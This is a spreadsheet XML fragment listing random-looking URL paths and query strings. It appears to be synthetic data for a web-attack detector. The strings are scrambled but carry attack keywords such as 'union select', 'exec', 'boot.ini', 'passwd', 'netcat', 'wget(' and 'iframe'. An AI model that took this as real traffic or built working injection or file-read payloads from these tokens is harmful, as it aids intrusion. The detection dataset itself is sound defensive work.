    <t>/1z0zvuwallobjectmte5qp/rn5eto8hwrse1oex0/at61ojya0aa9gxcw/seaod6ntode/eiaeavitthbaed/zzorsrnqx.x.2/1ho502uoktrltotaw5w/e7qy4c6/erfpg528bxa.php4?theita9irntet=tsaw-urriode%wp-re</t>
  </si>
  <si>
    <t>/ftmg4tao.mdb</t>
  </si>
  <si>
    <t>/-ud6xhrvy/9b9myhuyffmwc/djblqalu/eeddenmhtnmie/nn/gmvihv.pb33sn@/ert/ee5n/eikxdl0/cntttf@a/m0hldwjbxla9optb/s_hru.msf?atl=91283&amp;pkkiupdatec.8m=277884&amp;fssnibyketi=asnprocessing-instruction1rtenyces&amp;mnboftc5yrs=group+byn+lrmy('e&amp;oociu=h4tx9e+ryd&amp;6a6jareieaoo=o2e&amp;1ngvy_link=3&amp;qnsg=ade</t>
  </si>
  <si>
    <t>/sf7ewepbubluii4ysn2s/althoceos6eeuoy06/aqmacce.gif?itsnsusarthef=servicessoe&amp;q3_processing-instructionselect8@d=dsyssdfieer&amp;0ea_msunrnz=wlp&amp;tiedtntr=t&lt;rh5&amp;pajhqed9esrs=q8d-4e&amp;amlfaclnt6a=ia&amp;die8=eygzyo&amp;jlnuedtteshmsg=~x[h+&amp;cy=@&amp;educr=tdfrthp&amp;myvmbqyvb=eienminevdsttbstsh&amp;tnoeejtuzet7u=btdbqfeu_g&amp;eon=eodrop0i&amp;obei8yiydd2=4&amp;rtgu=eprl</t>
  </si>
  <si>
    <t>/4j/fun.js?sesn6no4seh=h&amp;mw7l@dfm=87808&amp;bwl6drresgniho=mgt&amp;nhlste5gt3=@eae6e&amp;nszh7@agastylest=ry&amp;9ito9sackwkte=n@8u=vposition&amp;q7lre=845222&amp;rg=ug2h&amp;2eccac8n=ehnhessbirk+dt&amp;k9mbgndh=otdeta&amp;bdh8dh2ettiapt3=id-r&amp;admrdrop=t34sody&amp;bnezf6soawu=]sylm</t>
  </si>
  <si>
    <t>/nmrn6achnudi/farsfdvs0e9m/e9.php4?iu=0646212702&amp;ioeeseoxji2astt=fodenpcemibma&amp;euhtlaynts=054&amp;nlwywxkgk45=nn5p5z</t>
  </si>
  <si>
    <t>/t37ccnbxtkfq10ev7krn/9mocyq@i/stmukaq/xochjlzyle2fi/wqjcgve3/g9n.mdb?ga2no3d=cgmw&amp;1nn=r-&amp;tfuohrdoah4gaei=it\\mochai&amp;b2oopnflatn=4yhstiuapadt&amp;zoemhnsinewmrsr=6076264&amp;esnrrod=5</t>
  </si>
  <si>
    <t>/fcusrxfci2zyo7l/id8w7oure/hnee0edcrtni/execxfyojba/cudibetweenbbetweeno4hbb/jsli1c/qhm9jnullua/3ncxeb.pl?rei=031&amp;tjcw8on=lexeciwindow.open&amp;clrna90=hh9t</t>
  </si>
  <si>
    <t>/emhrgbddiupessp/aihawqx/pbu6dmiwe94kmtbjwp94/p32mfzpyq5-/t0syf0a/medgwrk/c.bfqg7lhoz2h2qj27u.shtml?srotopuor6aat=98&amp;fis=eeewdhtechoaai&amp;sho=2&amp;agcarme9i=5509331</t>
  </si>
  <si>
    <t>/6ahwrdl8nrg1/afwmu71x1rqpmn.g/xzzsh4azmx/iwa4fcio/ye_.2/vuw6anllorcbiibrmn4/akwu9wa.@0/s5tohiuee4sam1/ntists0ncauoottlse/az7xeesqla0-/weadeetsnda.cgi</t>
  </si>
  <si>
    <t>/minnnbtbyt1.bin?cavbxopenm3usrsdt=6&amp;necntsfz2en=6&amp;n8ijomcord=extrsrjvaace&amp;lpoc1dyyrn=row07q&amp;oslbuhprans=rumochalocation</t>
  </si>
  <si>
    <t>/emh.asp</t>
  </si>
  <si>
    <t>/eaedcfvc/ea4unutaweastijeth.asp</t>
  </si>
  <si>
    <t>/dlnmmv5mvgepositionf/lmmbvbscriptxconnectffsjv/rdtlaohnuone/z8ooredoodhfss2/l@t2lzqb2.php?teotbpogsfouy6h=ndee&amp;rlerxcdd5ntw1o=aenphdelete&amp;cz=no01zr</t>
  </si>
  <si>
    <t>/rkb-omb5idkrg4/eu2.kvp7y0/-lwmscriptaccess_logt7i/ewilrsgmmneasnhnie0/yec/bastg/askqnj8eg/uieonz4c.jpg?omm4havingdjp=7&amp;avsdotiucsiph=o-&amp;ikjvuj0ttteios=6&amp;lcin3n=125298035&amp;rxednhitainau9r=elrwufmhj.g&amp;0ens3xuo=t&amp;srjvbscriptort6qbincd=iypo2u@ntldv&amp;ii4sstedtardise=98912026&amp;h2q0ab3ub=762768&amp;yxsler=4587&amp;eue9ot7as4n=780&amp;me=e;q+3ehcifrrqw&amp;r2yt=iieiunionint&amp;a)op?i5&amp;ip7cyeetnseo=t'a(gth)replacespc6nyptv&amp;uwhor=\\ts8i</t>
  </si>
  <si>
    <t>/ii5siudfd3/r5egbgmsq/nv/tmrta/bedescyf.dll?sam_.8union=3kh-ze&amp;hdeltaqclniogt=yuunione&amp;peoeso=872&amp;go_@b=701&amp;iea=501&amp;hyauemiko=0</t>
  </si>
  <si>
    <t>/oi/it2tgmp9pgs.php3?p9itten1c=8o9s&lt;sf&gt;&amp;tps=rcoe&amp;arc0esi=dtua2allugtnlqxgdoc&amp;leq@scriptgopefsk=+ot&amp;s@zf8ainccat1=tdoopencaot+acem&amp;iihhqwhwlnaersu=hfp87tj1eysr&amp;fw7atie=ue&amp;ppzpv=%xmlan&amp;ngujope3k=afdd&amp;wfqzw1@=axo&lt;dwrunion&amp;llobzizmooctx3=$-&amp;d0ue3uyeowtt=lzmconnecta</t>
  </si>
  <si>
    <t>/kg6gbc6cpg0g4ufrex/67privq3kov9sa/imn3a618_tlmn/gcw/fjaragk4c/ohiimuxf7rt/nroagdahxtnosiwmshsy/asnisbahtnrov/uuyrl4zid81k/tktedhinhkaeeet.sh</t>
  </si>
  <si>
    <t>/e1bsebmenabti/jbkddrexecofo3ingf/nsaetyttqtilnsadsano/ndgr8jxnp/eeyityim0bmetfba/onnosyt71se/myt0r4tj5onirclonged/eunxi2cq/eiigcus5l.asp?imtuaqietuihj=1883079084&amp;yagqalneap=:s@lmnuca9|oejiestdini&amp;nnyani6hl5rt=m9nhak&amp;sumsebrpvcs=88&amp;ndyhbk=omjteestaw&amp;oacsedbk5meis=lnirf&amp;ba=v++wchildnftpy&amp;zgeo0a=knqscripti0btfne&amp;kxgpndhavings=42801</t>
  </si>
  <si>
    <t>/@cnpp-ct/b7ny/eneesepni5aqqtegee/ia0cdn7inespoaasd/hsucyvrw_ltuw@p/cb8.shtml</t>
  </si>
  <si>
    <t>/mcceucto_zjuenb055/s2fgerwygmdhdmh9s5i/rglie@uw8pk/eeedeotaieze3odsf/tf0qgjtukkaskc/nvfhw7fx1idc/iilovvlslcqtntowrxf/srufl8s/5--yu.js?rdebgsrw=i@xdu&amp;ima5n3te=52&amp;qafrdocument=0823618&amp;o0tray9igneueqh=9horyo&amp;hkdejelhes=11&amp;elndeleeicitrqe=2900339999&amp;6sbottwtcc8e7sh=6314</t>
  </si>
  <si>
    <t>/th6voheoe/rutcieeyi8syrhoe7se.php?nedttfr=9695487317</t>
  </si>
  <si>
    <t>/tqws-jj5guuaecdlke/rtpjubscq-n/t1dxjhwlchta/eebqfk6ivxthwpw/o1bnj/7usrajexec@or1jwl8_/beeatunt/2s4fpsnes/e0cwltbxllslzz.html?erwre=run&amp;rtiesesixqk7bts=23&amp;f8hmieh=0&amp;saedygipeusaum=ixhg&amp;etnd=0a&amp;mtkp8co=]a</t>
  </si>
  <si>
    <t>/nsfnem/dxad/guqkmetaatqposition5/scmsdtp1ugvnuq1jlnf/shojw/gs6mwnc42t/cmd@mpsjq.shtml?aeocnerpizreezn=0&amp;nds4d0position=ee&amp;b2wuogatfd=498&amp;aizbbcidtqdwqr=m7h6uapfed;i&amp;ipny.a_ix=lh_ms&amp;omnlabenun=hraonulllc4ro&amp;hyleo4t7re8rwn4=3ahtt&amp;1hhamx=71044143&amp;wxdyspgu3oi=nviemrbeb8n</t>
  </si>
  <si>
    <t>/st8eefogal.js?uiuz=1041&amp;thineshhafeeao=2cetmomg&amp;gue=+|++m~otcuotp%g2igs&amp;9etrhb=ef+&amp;ayobc7q4nauc=s-6lqdl&amp;n1326at=&amp;p2ts&amp;eon2o113iau=184&amp;w8yrnhhssodt=iceilw</t>
  </si>
  <si>
    <t>/ztertseh5ke/tuupb6t/dptfy2p@/9aeaas/tgrswx/pmnnon8/unbzb2/qrabetween3vgojmunion/qm/egrhc/ftezc2uii3bo8tli64ue.cgi</t>
  </si>
  <si>
    <t>/wlltpcxot4reaobowve/ij2x@/sg..zp7sou1u/ho9atntaitosas0/p1dvc.opt8tand/bxn2jmok/coistcnlrmfbiora9i/osii/ewl9lbrhsneiz/ttdbpsasiqhi/xe/ttiyrd7lnu1tar0z.cfm?dstttsimgdabrd=ointinhusa&amp;lfs6crodio=979&amp;eonaimeete=ru5cag&amp;ecmstrw=853354&amp;ecaaespotayoig=385&amp;zq2nb=n+ynwindow.openslie14=sso&amp;chrwpqe4csxbtlh=winntf%nully&amp;1jhikmnp=0&amp;oai3sr1we=n</t>
  </si>
  <si>
    <t>/hkfqug/stf10b7eb8pv4oeaheh/fxmfddnbgaaas4/8tttsernertrncr3ut6t.png?celhkd=t&amp;less6za9=25&amp;yosfc3eeehna=thcsystem&amp;nfo1n1namcem=silw&amp;eiese5ej=3</t>
  </si>
  <si>
    <t>/jrfpp_dxw/s45mn2ksamndyo.gif?oeu=v7qtmy&amp;jofjlt-jtmpbgsound=48329665&amp;rnbeadouha9yn=eyn</t>
  </si>
  <si>
    <t>/rf_yupyf/dha2bg-d-yzqhcr/dv6g9muu@iilmtmp/hoeunmxfayln0on/2fgzs/bup7tojt/as8deapq7dredrs/hn9u098oeeooqnhbsa/yiulqcevjlwiw/bewtaistvi/no.mspx</t>
  </si>
  <si>
    <t>/ctsebuoirdpa/gsmdcazox.f/ebz9daq86evjegaf5ae/hz98bcdqi8g1/q9szaoihokdivr4oi/ts/cena9hsyrjrutkep0icz/o1tpxcoh_ps@6ew.pl?4mrtrugdsnt=|r&lt;+&amp;terttspnobtl=tyigu2k&amp;.uw2%uqqx2qt=style3on1ahn&amp;eu=utwrya5rdheuw7h5</t>
  </si>
  <si>
    <t>/jtvf-qz5at/mfzooxo/ofhqso0.a8nbkufc/8ntztatlc/2cxk@stpv5gnoaccept/tq6z5smlx@pnvfa/itwak/tfoipdut/snxnug0s6hz/vt8rber/ekvq.php3?hfhntihllag=um6h&amp;mcdhr48o1x6l=oteau&amp;uargdpeneeerni=onooaorsgtoeahttpshcr+&amp;kcumaonedast=etnnaaw&lt;35;+mxtermjrrs&lt;&amp;ncjulfolidv=99971536&amp;et=rb6p17e&amp;jl_d7kz_4=heooshutdownpt+&amp;wa4alneocit=pti6eic4eemse&amp;aifseoog=71&amp;8rhttpx0dw2dma=2&amp;0ypchildh=ist&amp;onxest=ldelete1e</t>
  </si>
  <si>
    <t>/atoodielnenrons/am/vnk8elthyhiyattmn7s/2nnmwa4rtncrt5a4.php4?xtensssr=frtnullod&amp;i0i&amp;fhog0ddws=hb4(-o4sselectuheih&amp;8tneeq7ac8=t+oecjakdeen+menntn&amp;ndltd1etwe=realsieli&amp;evydyiin=74303085&amp;rlink4iboot.ini=sbnyh9p&amp;aayreeahel=7258673</t>
  </si>
  <si>
    <t>/siwctfzpfbz.cgi</t>
  </si>
  <si>
    <t>/cstzluzo/rti.html?_hcxymselectpw=ses6etyzs7itsttn&amp;ttyaq0ao=6027&amp;otalpoeov2aboty=ytklfjs&amp;7hpzittaw9uor=90862339&amp;tftzerc7zt=0toq6rtiomrhrceec&amp;raasongbxg7ejg9=731584052&amp;or9ametraneqi=djzihx6ap4-&amp;iimoiyahbni=hmi&amp;ndntotfln6n1=8hsemqmvci&amp;ni=d7&amp;lmntt0arrxeis=3</t>
  </si>
  <si>
    <t>/zk/et1o5woxnis9eea0nai/z2eajiat/a8vwnksj.gc/dvu/azkqs1-lmu_rr27/fteilnilpssljetsuzst/nd2owf_d/nudeb7rldwon4w/nntcoahus.dll?nhevedee4tz=passwdh&amp;totcaksfiscnhri=hastti&amp;unsvrmur=9840499771&amp;htcopyxgvctxg=iui&amp;9onp6intaewmea=u&amp;eoriapftms=lvobmm&amp;rj_t8opts-net=cz2&amp;0bsp=lar0_3a&amp;ronter=abern4ieew6tcpo&amp;tajinjcicdmah=nodutuk&amp;yarci=boot.ini5&amp;toynadhdsn7n=?uo4</t>
  </si>
  <si>
    <t>/ta/ekl/esc05w-udv/00tmprk-kryqz/2uus4otxatnbt/uiptenfniarhd2y/menx/5ylemhvskvp/orizi.htm?iaotlti=@ma+rao+1dn&amp;@mmdljs=5&amp;w8smrcsareqiare=smdh3hunrq&amp;ner=19259&amp;ytnewfand=23065&amp;bea8eil=5203&amp;towlhrsm=2&amp;coo2mlhwd=zhk@iibhy9r&amp;t0rtttur8=4210998&amp;gmslht=nagoll0bfuyeqhrsi&amp;di7hey84soaroq=4rroiogirsiiwyt&amp;tseym5s2eiree=9&amp;tawsr3in57s=8i~\\a&amp;vqg@uimg9dpassthru=e+l2erlogov36hoc4ttselectq</t>
  </si>
  <si>
    <t>/sngkqc-nyej/hatiesww-n/hvq025rlsb/xf@_l0suash/moyqjservicestr6gi/etxntoo/m1sq.mspx?yd83qwhs=thswtns+tzk&amp;o7h=1&amp;mesaale=nir&amp;ytrc=5een&amp;oemsoylsncdemtt=9dc.wp&amp;akan=73802932&amp;nirs63otnam=95857086</t>
  </si>
  <si>
    <t>/afhahu2tik.8v4jkfk/tjaccess_logksqetmp9b/mc5p9ddrmct7kahtowa/sz-ohlyphpzuivexec/n-dzjoww7n/ze/.2_/bplbnz/nrxtavlnwe/e-2jmfu/2ldeo6jraxsmzbmskned/cpqby.php3</t>
  </si>
  <si>
    <t>/1xtyb/gltseratiips/om3u24l@id/ho/.4rmbd.1ksb.u/hniziteo/eqtuag55ymr/gmnogzstdintgrnxmllw.shtml?rhamo5si6team=670&amp;eiao=atox&amp;sv=sgn3a</t>
  </si>
  <si>
    <t>/cattlw9n1/d4orho/e5x1h/t7jnitg/cosp_wge0cw/r9dn8sdtx6b/3zk/ydvhmtzbg/rsazidvo/om.bin?ksea5=8559672&amp;lrseaeqbji7e=o3_d&amp;fy=925&amp;tzoeryrceafv=95&amp;ret4ahanesees=70530&amp;ivrou0e1v=865914&amp;tptuln2idarrn=678048230&amp;sbrovsfueiuom=e@5lscs-&amp;li&amp;rmen=icsecate0at&amp;o6afnt=87&amp;bh4hroot=oreet6shbc+jarwinnt</t>
  </si>
  <si>
    <t>/h0vnrp2r8o_/sceeitir/fejmz/rdzm.8_wgl098y@fq/zn-/qnftpg3k/nb5gy/sweegl9hopkslsbne.shtml?zoxg=31003&amp;pesiodn9elrt=125805&amp;eyisdr1=52918999&amp;mtitdatj=0inputst7&amp;saezlsttaf=7676&amp;heeessgal2=acceptlcd1zcti&amp;gea5bo=583&amp;aasss5ywahza=364&amp;.-fxl-tg=t&amp;dldnerdutsittya=20&amp;_wi8@dmailfrx=mtcx&amp;eo9hreplacetreplaceformixdnetcat=&amp;i]&gt;iluihomert[tsoyenusr&amp;oeqyfwght=eczl0q&amp;odxmlwxetcizecho=eaec+</t>
  </si>
  <si>
    <t>/irrneanmuzoum/n2mqhm8vjiohxdjoye/llieterujfatpm/o8szacct/efbxn/ecfjeym_4s30g.sh</t>
  </si>
  <si>
    <t>/mjbmhrscrgy/pbooueh2ob4x/mna0whg42/itiezni/eupeeyueno25uoinr.bin?adminnnb=yy5a&amp;htxlttteacmwtuk=catexec\\ii&amp;k5a%u-p=7res+05&amp;jrg8=cuetaore&amp;srn=15hnooptt7idswprocessing-instructiono&amp;qnccp8rwtexec8n.=5104476727&amp;nero=eaxterm&amp;el9hhlsseme3e0=2&amp;ltdlhfnnid=ezs@elstiai=oduwget(</t>
  </si>
  <si>
    <t>/enexvg42bcwwhn/sto/nroelctrvina/ycy/6niidscddrbny/jkiapcbdgtc/txp_8cnnurxp_rxt4/qnu.html?r7wpls7=e6pyeptsjr&amp;eit0n=nullsrnttceiwrieox&amp;qpwhwdocument0processing-instructionvc=9210427&amp;bqv4xhu91hv5=bwgfi&amp;gkh30aka5e=5d0s&amp;ixqbda=bp&amp;estoiliah=fkh-qumz3u&amp;btcbqeslan6a=aurkmrttt5iidoehr&amp;iiqeht2nndoto=he&amp;omegys=cs@fsgw7+35&amp;rutgeibieor4=&lt;dina&amp;ceo3sfeaahon9=hsleaeahasoatt&amp;hmrvohj=whttps&amp;mu9zl-fq6processing-instruction=an</t>
  </si>
  <si>
    <t>/wsswbbinkotnxiqw/bcrasc2s0egr6ey/tcvfibtfddgq5on3-jrl/sgh4ee/0mocha0izgxperl/l1vi@pyfctlz/weaof7eneiiom/ilenteol/gvpdqrelko/bdi0_gmyuq9/hgduc84f/tew-.eewhau.mspx</t>
  </si>
  <si>
    <t>/l0gl/tv2susheoa71/ttmyn9_5cyqt3zoqqw/adgku_ky0h.2z39bc1da/rnacdmid.gif?qzphpiq=ihtomores&amp;ayr=ui1t&amp;tp=tyof&amp;ijapnkwoiafian=+%it&amp;andue=bhttpsidnblgfnak&lt;3:&amp;pateuszlsnaso=3490300548&amp;coakk=nw-ed&amp;cxrxstimo=hets8o3bogdr0ea&amp;nmeeoyvs3qiwg=fimif</t>
  </si>
  <si>
    <t>/dogfof/anu0nx4yg5asrq/enelsendmdh/..ylogx@r3ap.shtml?oumafeseoilizp=uhltara6na&amp;eegohtt=klt&amp;l0aliuj=04184&amp;tys6f52dieei=vnrpe</t>
  </si>
  <si>
    <t>/9l3ozawq/c1gnlj6dqsjl4oai98tu/imitoeoi/snn75eh/ieghvcdeq0/ikklemd4oqbwl26ao/n07egjx.oc7/.iv3mi93g.jpeg?twi=7jrcpfy8w9&amp;hhos5flzvd8=645734495&amp;noieaitskrex=itqauwhhxdacashny&amp;aobli=7345818&amp;ixr3hrnt=jfewse&amp;sz8=6</t>
  </si>
  <si>
    <t>/lyvsoyn_4xcapcdki/5cya_qq0svfpygav/tpknh/eewv2_ht_uxfgzwvv5rz/mwjsxbttji/0p7if6jhg6.php3?a9ltwnn=af9cn5qdk&amp;r013f-catecxo=tish2hdin&amp;54e-1i_htacces=anodeposition&amp;ee=ce7sohlt|e9+lda&amp;do1=6645943800&amp;ws6ah=~n%y6a&amp;atmhigmeddeew=sep2dcni&amp;aqmuihngtja=sh?oatt38nhi&amp;hiswizesoe=st8xege&amp;b3=a2esi5ty04mochap8m&amp;oohhnirzeeq=gq5yw</t>
  </si>
  <si>
    <t>/2lv/nltxo8ie6/hacpgr/enspoeh3vitihhir5d1h/afreoieviese/ie2isogorhe7/atvqbhp1m7g1mqzx9mgi/niihszan4e/ebuf2/ibhds23hqc/asiogrgp.php?8je5la2=54594116&amp;pt4lfd7rbdq=oaeddxmle&lt;s&amp;ndsaod=niql0l93ubl&amp;mcbqn6bestod=ofc&amp;qph=oacg&amp;eutr=crhyt&amp;seeielnw=t.aw8-</t>
  </si>
  <si>
    <t>/fs0yo9o/fobjectfn/hxjvc.jpg</t>
  </si>
  <si>
    <t>/mgphu@cg7gs.jpg?dfisha=rmi</t>
  </si>
  <si>
    <t>/ynen/ek1nec2hm9/dx9hbnil7hldzn@msohj/bil4itfieeiypobigoy/ili4duasnhy.html?sbirs=9&amp;fstlb3tgj=qere49hee&amp;hlmrnalhinoyetk=cmd6c&amp;m1uu=76073759&amp;5dsoohlatspha=gal-@nts@og&amp;7ai4r4oeinm1z=h++ftperdrop&amp;loqe1erhhcuus=zha&amp;mdnrnernn=r&amp;spothini=0902354&amp;ke=6@igat&amp;delrpa=e4reweghufznr&amp;_52j=1075460&amp;qlrmnesnq=0a&lt;&amp;ecwit=ec|qe</t>
  </si>
  <si>
    <t>/cddjrmx2/is1yvoa/8a0f8at8oeaiaztf/93rfj/tdr6hyuazwaidhln6ie5/4fps-pq4lkg/ofrzvzj24n9p.png?eutmto=350465&amp;wcapan2tbabo1j=4474914&amp;adminssebi-bkcji=toqejoeytib</t>
  </si>
  <si>
    <t>/huqskpqd/8gbneadaso/hrtdx/eb/z6guucyo2havingecvar/n-f05klizcgi3ool/e3sa1tmorpicadhfuv/5esbqir/dmz-lry/ueteix.jsp?cypf3bhz=77784&amp;elehletnt=ipok3hteweoythavingifld]&amp;2teri=efktqdelraimge&amp;exwnnd4mnnspt=180&amp;3h==&gt;eustc4q$hzh</t>
  </si>
  <si>
    <t>/94aq3c1alo4/kxot92/pmp4qhsud@tauuw/etsoseuuqsk/qwylyx_e7evy/oq4vh-9.html?uhtfnitmsdmio=ee0ogo&amp;oal=cati&amp;neer6uwvtdfset=tcpji3qrq&amp;kjfgwindow.open=mmsruvzmx&amp;eetpeitnyolt=tanwa1sprns&amp;nlfountuwbeho=51514016&amp;nfhpihrtrii=5&amp;so3saioeet=ht&amp;o0aiiays=15933518&amp;say=eihaennlrthonteze&amp;adeveiafsk3rt2k=s8iqgeerhnn&amp;oa1dnolwbra=2466937&amp;rel6eeeudg=t5h6r5</t>
  </si>
  <si>
    <t>/cdo4ebwszdoe/optpk3onf04ypu/risih/osel7emde/uchkxi44nwtcou/qkqy/i0s-osxfzg45bivagerx/eg_3ip/pd2dsiatzmart/winnt-selectf1_wexdb5/le/gtmprcpi.shtml?teehtmd=ele&amp;caxguitmbyfsns=fbdeg&amp;txn8aoaiaoiydjn=4&amp;ph5endskladqc=eefprstnandeutp&amp;wesatet=la)&amp;eoopeaiol=i&amp;octsfetuin=176234</t>
  </si>
  <si>
    <t>/lbpsf/2flmew.lsgrbg/hly/yf/httpqkjcakuvey.cgi?jddlnyas=sam&amp;if=taieir8r&amp;so=fsrqastcoeirtswa&amp;0nrh6n3i6omd=7546&amp;ihe6gpte=eiyf6rln&amp;goodhhome=see++rte?+?tt1cn</t>
  </si>
  <si>
    <t>/9trhth/o-av2j2nqgevxml2z/thelwda/eyvvv05n/mwo/m6ittznee/wh1ugiphpxq27agev/a_lrregk0mzrmo/seho2k7/dp.png?ze5=12727785&amp;is4fisooqtsh=dcl&amp;rc2halln=upe%?&amp;caln.b2r=nltlspdiemme&amp;nvstnrnneglei=a&amp;tit4iaohia=tifwhe&amp;tinl=a-r</t>
  </si>
  <si>
    <t>/6s4hlinky/esiaroilutenu4fetc/p.j9n/di/vdkatqpumfggaev05/jdlfb6vf@bpgr-bmqwi/w5tewkk7ol0a3neeqeh.jpg?noorbirym=3393&amp;einwrg9pp=612&amp;mobr=nmo3r1e@ai&amp;e1a=psxinsl9a&amp;p2a3adaon=89&amp;cij5kopenudqxp=ettpniotryfe&amp;99tjinn=yn2enqcu-ricopyblike7&amp;enhpataoot=l0j&amp;hmpiutd=n0b&amp;t8elieea=8qttsa&amp;zexecxoacceptbzwu1w=1location&amp;eeoa33eaa=ieah9ho</t>
  </si>
  <si>
    <t>/ejf244iidrvqew/sidnogherntpmat/ea@uyuh.dll</t>
  </si>
  <si>
    <t>/1xirtmgmirtbo7hhso/nv/510ys1zp1-0nhtineq/h5dcq3o3x996yrlbs/cthrs.jpg?ostt34i=ht0s3euesn&amp;eohslutdsdcmma=iznmqisx3&amp;png=b16&amp;rlepsdnngameiet=ma2oelhlbo</t>
  </si>
  <si>
    <t>/c_twjpyzdhnhn/dtsgba/tae/taecwisi52ctnito/ijvwby-.wp2ffkhe/fnau.bin?ojeehaldlhoo=rrsoftsperlzio3es&amp;imailaa96lli6v=i+%?&amp;fmet5zeaowh=akmbk&amp;ux=mgceyn9ory</t>
  </si>
  <si>
    <t>/lmob3aajytkjhodo/pett3iyt/yoeiaajtfa/aibw-bxn6j/snhful_c1dj/2c1/rfj53hzcgniqlg/nssh/ok6c.jpg?ntdx4=@nh&amp;hi=on5gaapzs0&amp;b07ahvaruq=20&amp;1ilyv29dropibgsoundpy=rotnt&amp;et2eiei=86905&amp;r4anoiplfdfb=s/dmttahttphaving+(&amp;lhtodrsanlt=d</t>
  </si>
  <si>
    <t>/i_axaefoops7/92awbjumocha9_tvx1/qn5s/lwvmb3a.nuhqtlvwjp/lbni9acgtup/1ywo9@jzq/s_oo-p/tp.baei_ga@0z/sn04irtg5lqxnr/9tsn/-_.bin</t>
  </si>
  <si>
    <t>/iogmuellhuht/llelmczca/fottxxh03_mgrg/3.v5i/iw2glhanspotowt5o.css?tg=ddma5)on&amp;negtif3va7s=$r</t>
  </si>
  <si>
    <t>/oqfre5rjzagyn3bp/tb0.6yfkx6mnl1oqf/4sas8riw/pwdyahrf_aa/eijs2w7mpu@mfjl@.aspx?tey=l&gt;et&amp;fhaui9thrityfmt=0384252633&amp;kaa=z2eiqycnos&amp;rout1lassd=nakmiybeoecu&amp;l7oiaasoau5hrol=i&amp;ie3viutis6xus=i8gc&amp;5azeeclatoaref=4m6eerwe&amp;ibrh0s6kperlj=ydehxet8&amp;0tytyi6gboot.ini1=sonyotetmtseim&amp;eyastlndete=61655939&amp;xsfjati=e5ydlael&amp;ei=t</t>
  </si>
  <si>
    <t>/i6jsi/r-akdmd5u5dkhwz3yvp/q48k4lqflanz3/t7ehult/d2sozttidetorhhnent/trgjqvjbwgefn/k95sufp.sh</t>
  </si>
  <si>
    <t>/nn/mps@mn4ad_k7jhnal/7wxa4rbcmseydb3/deovoeftnbeue/rdyxpcfttm.kay9x8fip/ih2s/2deynph-q/oygbgvzhjpop3j7g/l3q/ri.php</t>
  </si>
  <si>
    <t>/wmvn.htm?tgm96=oawr4nyd7jh</t>
  </si>
  <si>
    <t>/arfx9tnrn.i/nmi.yxc5rjmvnwnp1j/nsiyxd-pmbd/h-x_nbbaqkkzglwsn8d/adbpecv@c5@jujrpfg8t/uauocsibtr8fg6o/jonnnqhnoe/shao.css</t>
  </si>
  <si>
    <t>/rj66d7/yrhetchtl7unionnwj/ydyy64fz@19zbzqmur02.asmx?ol4ordogeoa=19</t>
  </si>
  <si>
    <t>/tb_fmxsqkkrk/inqlv.w-d/a9z.s_vsdropzkpq/affxrp_9krqkojtk/rcvhwadrea4sto7dcn/nl.bin?mzvlu=452973&amp;stdinrcgel8utreplace5t=aarma&amp;cx=wmundk&amp;snraegte4=&gt;yhtpassei9ll&amp;so=wbueidpom&amp;sxl.i=no%q&lt;ecbopa&amp;2e57srh=296&amp;luercat40includeure6=5464207138&amp;evmxoskaneimrn=6197917791&amp;esroet=ix9wc-</t>
  </si>
  <si>
    <t>/edso/ngf8jxnkjdx6/ej@7/_.y7d8rguuq@8/igfhvy87asq_/0dip.png</t>
  </si>
  <si>
    <t>/op.as2m.ayo8u/ci9.xor0jaxvdsfo/vuzzvaf-0aop7ii3e1o/scajbjx/nllepysi0oaeas2tpe.jpeg?a5e7s=844571&amp;nbchnaekihiog=iislmnhtolvodice&amp;7lamjxea=njgvzn8mgxq0</t>
  </si>
  <si>
    <t>/resasqrafmsnlieoeaeu.png?acceptdt0dlffhh=18002723&amp;rs9iseuntleaw=medi:nerihstdinaep&gt;iframenhgxterm&amp;euedsrd=1ddinel6dntssnetmg&amp;4wu9lh=hcljfwxwx1yc&amp;iiebae7a=ifu.&amp;otpusrr5=tkdefhnelbody2n&amp;hyaobeto=355&amp;suort=ah&amp;rtxterm9dliframeqshm1=emshob&amp;41olnp7cr=ntnolbmochaengmu3ft&amp;abrsun=dh1dmdnlse&amp;wrteotym=26&amp;j2c3=163947&amp;hm=77923</t>
  </si>
  <si>
    <t>/hbuaga7ch3ryhtz5t.htm?o4tnatme9lsb=781&amp;en=ncd..qp5puj&amp;leff0ofromnetcato=oaspz_omk3dl&amp;hleroinsemlzdsi=pb7a8atnchildieagz&amp;sdirqdrrof3ce4u=nh_iy&amp;melnco7=12&amp;e6v69pa=m:aautoexecrrc;ln&amp;2teoahmis=ids&amp;2tintn4ekkru=@gf&amp;ua6d.ndwvkl=152410</t>
  </si>
  <si>
    <t>/kl8z21s/rtsnietnrnqjtqlt/ok0ko2n/osdclvpoy67cychilds/erenrflagt8/aeahlm.swf</t>
  </si>
  <si>
    <t>/slxjdasnre.png?u7ee=td&amp;bn1aysinh3naahn=ean</t>
  </si>
  <si>
    <t>/n9an8cot/udsyow/rqh-lm9wplj9/et7z/t2avnik@vhcda/m2n/ehlxtd0qlndce/heeofnetss6a.asp?r7vpfdwq2o=00282&amp;rg7uhe5ade=5058763843&amp;yrtzxle=2sawltyuiis</t>
  </si>
  <si>
    <t>/eo/al/fquf1xl/es2.shtml?be=126</t>
  </si>
  <si>
    <t>/b9us.khjoaf_asp3b/hyu2x_4g-ii/icriim5alg0ew/7dto8qh9e3v.u37_jgb/zp_hgbiptrt/39/pp0.css?hsweceshs0bos=yhstnes1ieeoiae&amp;evrelneh6lt=io9soirmktoepe&amp;rgrsevmi3fbi=ceta0k&amp;qmtaoi@m=s+h]o&amp;ow8e=otndtsnh&amp;uuaesa=2</t>
  </si>
  <si>
    <t>/lhenh0q7g18rcoesu/kglxhomeawvf1gci/h3rxwoq7_d2dnc7/zsconnectgsamw/ew/ijf7ex01y.php3?onibsi9bhapsa=taeanpnakej&amp;isnneststscpahh=j-lypnbadow&amp;st5she=74304&amp;apsba=73237&amp;itnifsett1tywat=ea8~oksswdf9dj8httpsrs&amp;1z1=17914&amp;emeuovzi=ag9vbda&amp;eedoari0rdie=@&amp;m7hkvxwh2fub=35213&amp;hehe0aa=er4itman&amp;sje0=924&amp;ritebwhsghme=wl]rrmaw</t>
  </si>
  <si>
    <t>/loqwchese/aca43ogdupdfsmnfst4n/ia/uv-7ofnowl/acn9m/laeuemghow/oeetomaiacooihr.dll?wstdeao=oe7vg4atc'+d3&amp;awih=331&amp;pndtrxzeoerlhe=36358223&amp;8zlocusd=~p</t>
  </si>
  <si>
    <t>/tii88stoc7eieasesia.htm?tluuredeaeheli=oev</t>
  </si>
  <si>
    <t>/2gjhgitbhcq.tiff</t>
  </si>
